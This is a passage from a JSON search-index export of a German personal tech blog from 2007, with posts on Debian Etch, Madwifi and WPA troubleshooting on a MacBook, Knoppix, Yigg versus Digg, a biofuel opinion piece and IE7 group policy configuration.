Layout!\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-12-relaunch-fertig-und-hoffentlich-gegluckt/","title":"Relaunch fertig und hoffentlich geglückt"},{"body":"Debian GNU/Linux 4.0 released :\nDebian GNU/Linux 4.0 released The Debian Project is pleased to announce the official release of Debian GNU/Linux version 4.0, codenamed “etch”, after 21 months of constant development. Debian GNU/Linux is a free operating system which supports a total of eleven processor architectures and includes the KDE, GNOME and Xfce desktop environments. It also features cryptographic software and compatibility with the FHS v2.3 and software developed for version 3.1 of the LSB.\nEndlich wurde Debian Etch freigegeben!\nFolgende Pakete und Paketversionen sind enthalten:\nK Desktop Environment 3.5 (KDE)\nGNOME desktop environment 2.14\nXfce 4.4 desktop environment\nGNUstep desktop 5.2\nX.Org 7.1\nOpenOffice.org 2.0.4a\nGIMP 2.2.13\nIceweasel (an unbranded version of Mozilla Firefox 2.0.0.3)\nIcedove (an unbranded version of Mozilla Thunderbird 1.5)\nIceape (an unbranded version of Mozilla Seamonkey 1.0.8)\nPostgreSQL 8.1.8\nMySQL 5.0.32\nGNU Compiler Collection 4.1.1\nLinux kernel version 2.6.18\nApache 2.2.3\nSamba 3.0.24\nPython 2.4.4 and 2.5\nPerl 5.8.8\nPHP 4.4.4 and 5.2.0\nAsterisk 1.2.13\nWie gewohnt nicht die neuesten Pakete, aber in einer sehr stabilen Distribution und funktionierender Sicherheitsarchitektur.\nUpdatess sollten einfach über apt-get durchgeführt werden können, bzw. über aptitude.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://lists.debian.org/debian-announce/debian-announce-2007/msg00002.html\" target=\"_blank\"\u003eDebian\nGNU/Linux 4.0 released \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDebian GNU/Linux 4.0 released The Debian Project is pleased to announce\nthe official release of Debian GNU/Linux version 4.0, codenamed “etch”,\nafter 21 months of constant development. Debian GNU/Linux is a free\noperating system which supports a total of eleven processor\narchitectures and includes the KDE, GNOME and Xfce desktop environments.\nIt also features cryptographic software and compatibility with the FHS\nv2.3 and software developed for version 3.1 of the LSB.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eEndlich wurde Debian Etch freigegeben!\u003c/p\u003e\n\u003cp\u003eFolgende Pakete und Paketversionen sind enthalten:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.kde.org\" target=\"_blank\"\u003eK Desktop Environment \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 3.5 (KDE)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.gnome.org\" target=\"_blank\"\u003eGNOME desktop environment \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 2.14\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-08-debian-gnulinux-40-released/","title":"Debian GNU/Linux 4.0 released"},{"body":"Heute habe ich mit dem Update-Paket von WordPress Deutschland mein WordPress Blog aktualisiert.\nWie vorgeschlagen habe ich die Datenbank und das WordPressverzeichnis gesichert, sowie alle Plugins deaktiviert. Danach die geänderten Dateien hochgeladen.\nBisher funktioniert alles wie gehabt. Für Akismet gab es ebenfalls ein Update. Ich muss noch nachsehen, wie man das Icon für externe Links vom Akismet Counter entfernt.\n","excerpt":"\u003cp\u003eHeute habe ich mit dem\n\u003ca href=\"http://blog.wordpress-deutschland.org/2007/04/03/wordpress-213-und-2010-de-edition.html\" target=\"_blank\"\u003eUpdate-Paket\nvon WordPress Deutschland \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n mein WordPress Blog aktualisiert.\u003c/p\u003e\n\u003cp\u003eWie vorgeschlagen habe ich die Datenbank und das WordPressverzeichnis\ngesichert, sowie alle Plugins deaktiviert. Danach die geänderten Dateien\nhochgeladen.\u003c/p\u003e\n\u003cp\u003eBisher funktioniert alles wie gehabt. Für Akismet gab es ebenfalls ein\nUpdate. Ich muss noch nachsehen, wie man das Icon für externe Links vom\nAkismet Counter entfernt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-07-wordpress-update-auf-version-213/","title":"WordPress Update auf Version 2.1.3"},{"body":"Meine Tests mit dem neuen Entwicklerbranch von Madwifi gehen weiter. Bei Ubuntu Feisty Fawn hat inzwischen der Kernel: 2.6.20-14 Einzug gehalten.\nDie Kompilierung der Madwifi-Quellen läuft fehlerfrei durch, ich benutze die wpa_supplicant Pakete, die bei Ubuntu 7.04 mitgeliefert werden, also im Moment 0.5.7-2.\nIch kann die Karte aktivieren, der AP wird gefunden, die SSID aufgelöst und laut Handbuch sollte ein dhclient ath0 genügen, aber leider aber klappt nichts mehr.\nDer Airport Express ist auf WPA-2 Private Key eingestellt und sollte meiner Meinung nach auch unter Ubuntu funktionieren.\nIch habe jetzt auf verschiedenen Seiten gelesen, daß man unbedingt wpa_supplicant selbst kompilieren soll, da die mitgelieferten Pakete nur mit den alten madwifi-Karten funktionieren. Dann werde ich das jetzt als nächstes tun.\nIch wollte eigentlich die wichtigsten Konfigurationseinstellungen direkt von Mac OS X auf die Ubuntu Platte schreiben. Dummerweise habe ich aus Gewohnheit ext3 formatiert und ich bekomme mit den ext2-Treibern für Mac OS X die Platte nicht gemountet.\nIch hab das jetzt mal aus dem Terminal probiert und siehe da. Die Platte wird als ext2 gemountet. Das fehlende Journaling stört mich da erstmal nicht!\nsudo mkdir /Volumes/linuxdisk\u0026lt;br /\u0026gt;sudo mount -t ext /dev/disk0s3 /Volumes/linuxdisk\nGrr, die Platte bzw. Partition ist jetzt gemountet, aber read-only und sämtliche Schalter, die mir so einfallen ändern nichts daran. Naja, wenigstens kann ich jetzt lesend auf die Konfiguration zugreifen und kann die Orginale auf USB Stick ziehen um sie zu ändern.\nHmm, laut den letzten Tickets zum 0.9.30.10 Branch von Madwifi gibt es Probleme mit verschlüsselten Verbindungen am Macbook. Ich hoffe die täuschen sich. Einer der Entwickler vermutet ein Problem mit der HAL.\nIch habe aus Verzeifelung wpa_gui installiert, bekomme hier aber gar keine Verbindung zu Stande…\nErgebnis Mit wpa_gui sieht man sehr gut, daß der 4-way Handshake kurzzeitig zusammenkommt, dann aber wieder zurückgesetzt wird. Ich habe jetzt die Ubuntu Pakete von wpasupplicant einmal mit den Ubuntu.diffs kompliliert, als auch die Originalsourcen getestet. Bei allen wpa_supplicant das gleiche Problem. Die Verbindung kommt hoch, die SSID und MAC werden angezeigt, aber nach kurzer Zeit wieder abgebrochen, dann folgen ein paar Versuche die mit Disconnected enden und es folgt wieder der geglückte 4-Way Handshake.\nIch habe jetzt keine Idee mehr, warte auf Neuerungen am 0.9.30.10 Branch und werde weitere Versuche hier posten. Ich denke aber, daß für eine Entwicklerversion schon viel passiert ist und ich hoffe, daß das Madwifi-Projekt das Problem in den Griff bekommt.\n","excerpt":"\u003cp\u003eMeine Tests mit dem neuen Entwicklerbranch von\n\u003ca href=\"http://www.madwifi.org\" target=\"_blank\"\u003eMadwifi \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n gehen weiter. Bei\n\u003ca href=\"http://www.ubuntu-linux.org\" target=\"_blank\"\u003eUbuntu \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Feisty Fawn hat inzwischen der\n\u003ca href=\"http://www.kernel.org\" target=\"_blank\"\u003eKernel: 2.6.20-14 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Einzug gehalten.\u003c/p\u003e\n\u003cp\u003eDie Kompilierung der Madwifi-Quellen läuft fehlerfrei durch, ich benutze\ndie wpa_supplicant Pakete, die bei Ubuntu 7.04 mitgeliefert werden, also\nim Moment 0.5.7-2.\u003c/p\u003e\n\u003cp\u003eIch kann die Karte aktivieren, der AP wird gefunden, die SSID aufgelöst\nund laut Handbuch sollte ein dhclient ath0 genügen, aber leider aber\nklappt nichts mehr.\u003c/p\u003e\n\u003cp\u003eDer Airport Express ist auf WPA-2 Private Key eingestellt und sollte\nmeiner Meinung nach auch unter Ubuntu funktionieren.\u003c/p\u003e\n\u003cp\u003eIch habe jetzt auf verschiedenen Seiten gelesen, daß man unbedingt\nwpa_supplicant selbst kompilieren soll, da die mitgelieferten Pakete nur\nmit den alten madwifi-Karten funktionieren. Dann werde ich das jetzt als\nnächstes tun.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-07-madwifi-branch-093010-mit-macbook-core2duo/","title":"Madwifi Branch 0.9.30.10 mit Macbook Core2Duo"},{"body":"Madwifi.org hatte erste Testversionen des Treibers mit neuer HAL veröffentlicht. Ich habe den Treiber und Ubuntu 7.04 kompiliert, ndiswrapper deaktiviert und den Treiber eingebunden. Die Karte Atheros wird richtig erkannt und die Kernelmeldungen sind vielversprechend.\nLeider scheint die WPA-Verschlüsselung noch nicht zu funktionieren, da ich keine Verbindung aufbauen kann und immer nach dem Schlüssel gefragt werden. Ich hoffe die nächste Treiberversion unterstützt dann auch Verschlüsselung.\nTreiber über svn oder tarball herunterladen:\nsvn tarball Laut diesem Ticket auf madwifi.org funktioniert auch WPA, man muss nur eine Option aktivieren. Ich teste das und melde mich dann wieder.\nUpdate 1. April 2007 Gestern habe ich noch mehrere Versuche gestartet, die neuen madwifi-Treiber unter Ubuntu Feisty Fawn zu starten. Mit Kernel 2.6.20-13 bekomme ich einen Speicherfehler und keine Verbindung. Mit Kernel 2.6.20-8 startet der Treiber, allerdings funktioniert bei mir kein Zugriff auf verschlüsselte Netzwerke.\n","excerpt":"\u003cp\u003eMadwifi.org hatte erste Testversionen des Treibers mit neuer HAL\nveröffentlicht. Ich habe den Treiber und Ubuntu 7.04 kompiliert,\nndiswrapper deaktiviert und den Treiber eingebunden. Die Karte Atheros\nwird richtig erkannt und die Kernelmeldungen sind vielversprechend.\u003c/p\u003e\n\u003cp\u003eLeider scheint die WPA-Verschlüsselung noch nicht zu funktionieren, da\nich keine Verbindung aufbauen kann und immer nach dem Schlüssel gefragt\nwerden. Ich hoffe die nächste Treiberversion unterstützt dann auch\nVerschlüsselung.\u003c/p\u003e\n\u003cp\u003eTreiber über svn oder tarball herunterladen:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://madwifi.org/browser/branches/madwifi-hal-0.9.30.10\" target=\"_blank\"\u003esvn \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://snapshots.madwifi.org/madwifi-hal-0.9.30.10\" target=\"_blank\"\u003etarball \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLaut diesem \u003ca href=\"http://madwifi.org/ticket/1243\" target=\"_blank\"\u003eTicket auf madwifi.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nfunktioniert auch WPA, man muss nur eine Option aktivieren. Ich teste\ndas und melde mich dann wieder.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-31-neue-hal-bei-madwifiorg/","title":"Neue HAL bei madwifi.org"},{"body":"Ich habe mir gleich heute morgen die neue ct gekauft und die beiliegende Knoppix-DVD auf meinem Macbook getestet.\nDer Bootvorgang ging erstaunlich schnell, allerdings wurde trotz des Bootparameters screen=1280×800 der Desktop auf 1024×768 eingestellt. Die eingebaute WLAN-Karte wurde ebenfalls nicht erkannt, was mich nicht weiter wunderte, da es noch keine nativen Treiber gibt.\nIch habe die gleichen Windows-Treiber für Ndiswrapper ausgewählt, wie bei meiner Feisty Fawn Installation, allerdings wurde die Karte nicht gestartet.\nDa ich inzwischen gesehen habe, daß Madwifi am 28.3 eine neue HAL bekommen hat und erste Beta-Versionen verfügbar sind, habe ich den Knoppix-Test erstmal abgebrochen und werde den neuen Madwifi-Treiber ausprobieren.\nDer erste Eindruck von Knoppix war cool, der Start war sehr schnell, allerdings hat mich die falsche Monitoreinstellung und der abgebrochene ndiswrapper doch verwundert. Dazu mehr, wenn ich weiter getestet habe.\n","excerpt":"\u003cp\u003eIch habe mir gleich heute morgen die neue ct gekauft und die beiliegende\nKnoppix-DVD auf meinem Macbook getestet.\u003c/p\u003e\n\u003cp\u003eDer Bootvorgang ging erstaunlich schnell, allerdings wurde trotz des\nBootparameters screen=1280×800 der Desktop auf 1024×768 eingestellt. Die\neingebaute WLAN-Karte wurde ebenfalls nicht erkannt, was mich nicht\nweiter wunderte, da es noch keine nativen Treiber gibt.\u003c/p\u003e\n\u003cp\u003eIch habe die gleichen Windows-Treiber für Ndiswrapper ausgewählt, wie\nbei meiner Feisty Fawn Installation, allerdings wurde die Karte nicht\ngestartet.\u003c/p\u003e\n\u003cp\u003eDa ich inzwischen gesehen habe, daß Madwifi am 28.3 eine neue HAL\nbekommen hat und erste Beta-Versionen verfügbar sind, habe ich den\nKnoppix-Test erstmal abgebrochen und werde den neuen Madwifi-Treiber\nausprobieren.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-31-knoppix-52-ct-edition-am-macbook/","title":"Knoppix 5.2 ct-Edition am Macbook"},{"body":"KNOPPIX Linux Live CD :\nWie bereits auf Heise.de angekündigt ist in der zur CeBIT 2007 erscheinenden c’t Ausgabe 7/07 die Erstausgabe der Knoppix 5.2.0 Special Edition zu finden. Diese Version ist nur im Heft sowie in begrenzter Auflage auf der CeBIT 2007 am Heise-Stand in Halle 5 sowie am Rheinland-Pfalz-Stand in Halle 9, C39/21 erhältlich.\nIn der aktuellen ct 7/2007 die morgen erscheint, ist die neue Knoppix 5.2 DVD enthalten! Der Download wird dann mit Version 5.2.1 im April freigegeben sein.\nEnthalten sind unter anderem die Virtualisierungsprogramme Xen , VServer und OpenVZ . Zum Ausprobieren also ideale Voraussetzungen.\nAusserdem sind sowohl Beryl, als auch Compiz auf der DVD und bieten gute Möglichkeit die eigene Hardware zu testen, ob die Grafikkarte die 3D Funktionen unterstützt.\nIch freu mich schon auf den ersten Test und werde mal ausprobieren, welche Funktionen des MacBooks mit der Knoppix 5.2 möglich sind.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.knoppix.org/\" target=\"_blank\"\u003eKNOPPIX Linux Live CD \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWie bereits auf Heise.de angekündigt ist in der zur CeBIT 2007\nerscheinenden c’t Ausgabe 7/07 die Erstausgabe der Knoppix 5.2.0 Special\nEdition zu finden. Diese Version ist nur im Heft sowie in begrenzter\nAuflage auf der CeBIT 2007 am Heise-Stand in Halle 5 sowie am\nRheinland-Pfalz-Stand in Halle 9, C39/21 erhältlich.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eIn der \u003ca href=\"http://www.heise.de/ct/inhalt.shtml\" target=\"_blank\"\u003eaktuellen ct \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 7/2007 die\nmorgen erscheint, ist die \u003ca href=\"http://www.heise.de/ct/07/07/148/\" target=\"_blank\"\u003eneue Knoppix\n5.2 DVD \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n enthalten! Der Download wird dann mit Version 5.2.1 im April\nfreigegeben sein.\u003c/p\u003e\n\u003cp\u003eEnthalten sind unter anderem die Virtualisierungsprogramme\n\u003ca href=\"http://www.cl.cam.ac.uk/Research/SRG/netos/xen/\" target=\"_blank\"\u003eXen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n ,\n\u003ca href=\"http://linux-vserver.org/\" target=\"_blank\"\u003eVServer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und \u003ca href=\"http://openvz.org/\" target=\"_blank\"\u003eOpenVZ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Zum\nAusprobieren also ideale Voraussetzungen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-30-ct-72007-knoppix-52-enthalten/","title":"ct 7/2007 – Knoppix 5.2 enthalten"},{"body":"NETZEITUNG AUSLAND: Castro wirft Bush Umweltfrevel vor :\nUS-Präsident Bush setzt sich neuerdings für Biosprit ein. Für Kubas Staatschef Castro gefährdet er damit das Leben von Milliarden Menschen.\nDa hat Fidel Castro nicht ganz unrecht. Ich denke auch, daß es problematisch, nicht die Technik der Fahrzeuge zu ändern, sondern nur das Mittel, das man zum Antrieb verbrennt.\nBereits jetzt ist bei uns Biodiesel nicht billiger, als normaler Diesel zu haben. Er verbrennt ebenfalls zu CO2, dieses ist zwar erst die letzten Monate entstanden und nicht vor Jahrmillionen, aber es ist immer noch CO2!\nSowohl Brasilien, als auch Indonesien und Malaysia planen und bauen neue Anlagen zur Palmöl-Herstellung. Der Platz dafür wird entweder neu gerodet (Brandrodung verursacht weit mehr CO2 als durch den Einsatz von Palmöl eingespart wird) und damit wichtiger Urwald vernichtet, oder Nahrungsmittel-Plantagen werden mit neuen Früchten bestückt. In Indonesien verlieren die letzten freilebenden Orang-Utans ihre Lebensgrundlage.\nDa Palmöl billiger als etwa Raps ist, kann die heimische Rapsöl-Produktion ihre Produkte nicht mehr kostendeckend absetzen und ein an sich gutes Mittel zum Klimaschutz kehrt sich um und wird zum Klimakiller.\nWenn dieser Trend so weiter geht, dann wird Fidel Castro u.U. Recht haben und auch die Hungersnöte werden wieder schlimmer.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.netzeitung.de/ausland/599672.html\" target=\"_blank\"\u003eNETZEITUNG AUSLAND: Castro\nwirft Bush Umweltfrevel vor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eUS-Präsident Bush setzt sich neuerdings für Biosprit ein. Für Kubas\nStaatschef Castro gefährdet er damit das Leben von Milliarden Menschen.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eDa hat Fidel Castro nicht ganz unrecht. Ich denke auch, daß es\nproblematisch, nicht die Technik der Fahrzeuge zu ändern, sondern nur\ndas Mittel, das man zum Antrieb verbrennt.\u003c/p\u003e\n\u003cp\u003eBereits jetzt ist bei uns Biodiesel nicht billiger, als normaler Diesel\nzu haben. Er verbrennt ebenfalls zu CO2, dieses ist zwar erst die\nletzten Monate entstanden und nicht vor Jahrmillionen, aber es ist immer\nnoch CO2!\u003c/p\u003e\n\u003cp\u003eSowohl Brasilien, als auch\n\u003ca href=\"http://www.br-online.de/daserste/report/archiv/2007/00372/\" target=\"_blank\"\u003eIndonesien\nund Malaysia \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n planen und bauen neue Anlagen zur Palmöl-Herstellung. Der\nPlatz dafür wird entweder neu gerodet (Brandrodung verursacht weit mehr\nCO2 als durch den Einsatz von Palmöl eingespart wird) und damit\nwichtiger Urwald vernichtet, oder Nahrungsmittel-Plantagen werden mit\nneuen Früchten bestückt. In Indonesien verlieren die letzten\nfreilebenden Orang-Utans ihre Lebensgrundlage.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-29-netzeitung-castro-wirft-bush-umweltfrevel-vor/","title":"Netzeitung: Castro wirft Bush Umweltfrevel vor"},{"body":"Einige Leser haben korrekt angemerkt, daß der vorgehende Artikel nicht viel mit der Überschrift gemein hatten. :-)\nDas stimmt natürlich, ich denke das liegt vorallem daran, daß ich wärend einer Zugfahrt angefangen habe, den Artikel zu schreiben und da einige Recherchemöglichkeiten gefehlt haben.\nShutdown-Day Phantom hat mich darüber aufgeklärt, daß der Shutdown letzten Samstag angekündigt war und vorallem Wartungszwecken diente. Das finde ich schon um einiges Vernünftiger, ich konnte mir nämlich keinen Grund vorstellen, warum man seine Webseite wegen sowas abschaltet.\nLadezeiten Die Ladezeiten sind wieder erträglich, da der Yigg-Button nur noch auf den Artikelseiten, nicht aber auf der Übersichtseite (Home) gezeigt werden. Da hier zwischen fünf und zehn Yigg-Abfragen gleichzeitig laufen, denke hat das die Wartezeiten verursacht.\nIrakkrieg Hallo Phantom, ich wäre auch sauer, wenn ihr wegen einem Krieg down geht, da die Berichterstattung und Auffindung von Informationen behindert wird und dadurch eher kontraproduktiv ist.\nIch habe damals eine rein technische Seite zu Linux und Notes geführt und fand das als Demo ganz gut. Die Resonanz gab mir Recht, da sich sehr viele Leute aufgeregt haben. :-)\nDigg Ich bleibe vorerst bei Yigg, da auf Digg v.a. englische Posts veröffentlicht werden. Allerdings wurde neulich im “Webmasters on the roof-Podcast” gesagt, daß ein Link auf der 1. Seite von Digg ca. 150000 Hits generiert und das ist nicht von schlechten Eltern.\nIch habe vielleicht auch übertrieben, daß Yigg der Konkurrent von Digg sein möchte. Aber die ähnliche Aufmachung hat mich zu dieser Aussage verleitet.\nWas ist jetzt besser? Keine Ahnung. Meine Artikel sind nicht gut genug, um auf der Yigg-Startseite zu landen und für den größten Teil der Erdbevölkerung zu unverständlich, um bei Digg aufzufallen. :-)\nLinks Kommentare zum vorhergehenden Post ","excerpt":"\u003cp\u003eEinige Leser haben korrekt angemerkt, daß der vorgehende Artikel nicht\nviel mit der Überschrift gemein hatten. :-)\u003c/p\u003e\n\u003cp\u003eDas stimmt natürlich, ich denke das liegt vorallem daran, daß ich wärend\neiner Zugfahrt angefangen habe, den Artikel zu schreiben und da einige\nRecherchemöglichkeiten gefehlt haben.\u003c/p\u003e\n\u003ch1 id=\"shutdown-day\"\u003eShutdown-Day \u003ca href=\"#shutdown-day\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003ePhantom hat mich darüber aufgeklärt, daß der Shutdown letzten Samstag\nangekündigt war und vorallem Wartungszwecken diente. Das finde ich schon\num einiges Vernünftiger, ich konnte mir nämlich keinen Grund vorstellen,\nwarum man seine Webseite wegen sowas abschaltet.\u003c/p\u003e\n\u003ch1 id=\"ladezeiten\"\u003eLadezeiten \u003ca href=\"#ladezeiten\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eDie Ladezeiten sind wieder erträglich, da der Yigg-Button nur noch auf\nden Artikelseiten, nicht aber auf der Übersichtseite (Home) gezeigt\nwerden. Da hier zwischen fünf und zehn Yigg-Abfragen gleichzeitig\nlaufen, denke hat das die Wartezeiten verursacht.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-29-yigg-die-zweite-ich-bleibe-bei-yigg/","title":"Yigg die Zweite (ich bleibe bei Yigg)"},{"body":"Bisher habe ich neben den Datumsboxen auch den Yigg -Punkte-Stand und den Yigg-It-Button neben den Artikel-Überschriften angezeigt. Hatte das Auswirkungen auf Leserzahlen oder Pagehits?\nLadezeiten Die Ladezeiten der Seiten haben sich stark negativ geändert, seit ich den Yigg-Javascript in das Template eingebaut habe. Die Ladezeit der Startseite geht inzwischen gegen 30 Sekunden. Das ist mir und sicher auch den Lesern entschieden zu lange.\nAus diesem Grund habe ich die Punkteanzeige neben den Artikelüberschriften wieder deaktiviert.\nBesucherzahlen Ich denke nicht, daß der Yigg-Button große Auswirkungen auf die Besucheranzahl haben wird. Bisher sind pro Tag ca. 5 Leser über Yigg auf mein Blog gekommen. Die kommen aber über das Yigg-Wordpress-Plugin und nicht wegen der Punkte.\nDie Chance auf die Yigg-Startseite zu kommen, mag zwar geringer werden, aber das bringt laut verschiedenen Aussagen anderer Blogs nur ca. 60 Leser.\nShutdown-Day Mich hat letzten Samstag auch ziemlich geärgert, dass Yigg.de beim Shutdown-Day teilgenommen hat. Ich fand die Idee des Shutdown-Days ja ganz nett, aber für den User an sich und nicht für Webseiten.\nDigg-Konkurrent? Ich lasse mir aber nicht von zwei amerikanischen Bloggern einen Tag vorschreiben, an dem mein Rechner aus bleibt. Das Ziel war, um zu testen, ob man selbst vom Rechner oder Internet abhängig ist und u.U. auch um Strom zu sparen, aber durch das Abschalten von Webseiten ist doch nichts gewonnen. Das kann natürlich jeder halten wie er will, aber Webseiten sollten doch von solchen Aktionen nicht betroffen, oder? Vorallem nicht, wenn man doch die deutsche Konkurrenz zu Digg sein möchte.\nAls der Irak-Krieg vor der Tür stand, habe ich meine Seite auch deaktiviert und auf die Problematik hingewiesen, das war aber denke ich aus wichtigen Gründen, um auf ein Problem hinzuweisen. Im Prinzip eine nicht angekündigte Online-Demonstration. Das würde ich als Grund auch jederzeit schlucken bzw. akzeptieren, aber wegen dem Shutdown-Day?\nDie nächsten Tage werde ich mal recherchieren, ob es Vorteile hat, wenn man Digg nutzt, auch wenn man v.a. deutsche Blog-Artikel schreibt. Mal sehen.\n","excerpt":"\u003cp\u003eBisher habe ich neben den Datumsboxen auch den\n\u003ca href=\"http://www.yigg.de\" target=\"_blank\"\u003eYigg \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n-Punkte-Stand und den Yigg-It-Button neben den\nArtikel-Überschriften angezeigt. Hatte das Auswirkungen auf Leserzahlen\noder Pagehits?\u003c/p\u003e\n\u003ch1 id=\"ladezeiten\"\u003eLadezeiten \u003ca href=\"#ladezeiten\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eDie Ladezeiten der Seiten haben sich stark negativ geändert, seit ich\nden Yigg-Javascript in das Template eingebaut habe. Die Ladezeit der\nStartseite geht inzwischen gegen 30 Sekunden. Das ist mir und sicher\nauch den Lesern entschieden zu lange.\u003c/p\u003e\n\u003cp\u003eAus diesem Grund habe ich die Punkteanzeige neben den\nArtikelüberschriften wieder deaktiviert.\u003c/p\u003e\n\u003ch1 id=\"besucherzahlen\"\u003eBesucherzahlen \u003ca href=\"#besucherzahlen\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eIch denke nicht, daß der Yigg-Button große Auswirkungen auf die\nBesucheranzahl haben wird. Bisher sind pro Tag ca. 5 Leser über Yigg auf\nmein Blog gekommen. Die kommen aber über das Yigg-Wordpress-Plugin und\nnicht wegen der Punkte.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-29-ist-yigg-eine-alternative-zu-digg/","title":"Ist Yigg eine Alternative zu Digg"},{"body":"Ausgangslage Mit der Einführung des IE7 wurde auch die adm also die Vorlage für Gruppenrichtlinien angepaßt.\nDie neu eingeführte Zone und die daraus entstandene neue Zuordnung der Intranet- und Internetseiten ist erstmal ungewohnt und birgt auch noch einige Klippen, die umschifft werden wollen.\nEigentlich mag ich als Browser den Firefox , es gibt aber leider zu viele Anwendungen, die nur mit dem IE funktionieren und die trotzdem verwendet werden (müssen).\n1. Versuch Der erste Versuch der Anpassung der Einstellungen über GPO ist bei mir leider gescheitert. Nach der Aktivierung der meiner Meinung nach nötigen Einstellungen ging plötzlich die Authentifizierung am WSUS-Server nicht mehr. Vermutlich war die Zonenzuordnung falsch.\nNeuer Testansatz Nachdem ich mir nicht sicher bin, welche Einstellungen durch die letzten Versuche mit GPO übriggeblieben sind, werden wir diesmal mit einem virtuell installierten Windows XP unter VMWare Server 1.0.1 testen.\nGrundsätzlich erwarte ich erstmal keine größeren Probleme, wir haben aber einige Webanwendungen an die man sich mit lokal installierten Zertifikaten authentifiziert. Hier denke ich sind sicher aufwendigere Testroutinen notwendig.\nWeb Ich habe bisher noch keine Beschreibung der IE7-Gruppenrichtlinien im Netz gefunden. Entweder ist es so simpel, daß man keine Anleitung braucht und ich bin einfach zu blöd dafür, oder es haben noch nicht viele ausprobiert?\nTestausführung Der erste Versuch ging leider schief. Die Gruppenrichtlinie wird angewendet, die Einstellungen sind soweit auch richtig, nur die Startseite mit den Einstellungen des IE7 würde ich gerne unterdrücken.\nWieder ein Fehler ist gefunden. Die Unterdrückung der Einstellungsseite ist eine Gruppenrichtlinie für Benutzer und nicht für Computer. Wir haben als aktiviert, dass Benutzer- und Computergruppenrichtlinie zusammengeführt wird und die Einstellung im Benutzerbereich gemacht.\nDie Einstellung für die Deaktivierung der Einstellseite findet man hier: Benutzerkonfiguration – Administrative Vorlagen: Windows-Komponenten/Internet Explorer/\nJetzt versuche ich als nächstes Live Search in Google Search umzubiegen. Bisher habe ich nur Möglichkeiten gefunden die Suchseitenanbieter zu konfigurieren, aber nicht fest vorzugeben, daß Google der Standardsuchdienst ist.\nIch wollte heute wie bei Microsoft beschrieben ein adm-File erstellen. Ich konnte die Datei auch im Gruppenrichtlinien-Editor importieren (Rechtsklick auf Administrative Vorlagen), sie wurde aber nirgends angezeigt. Außerdem gelingt es mir einfach nicht, den Default-Suchdienst auf Google zu setzen. Laut dem Microsoft-Artikel sollte eigentlich jeder Suchanbieter eine eigene Nummer haben, der beim Suchanbieter erfragt werden kann. Das kann nicht ganz stimmen, da ich jedesmal eine andere Nummer bekomme, wenn ich auf unterschiedlichen PCs oder virtuellen Maschinen Google hinzufüge und zum Standard mache.\nLinks Technology Overview: Internet Explorer 7 for the Enterprise Internet Explorer 7 Deployment Guide IE 7 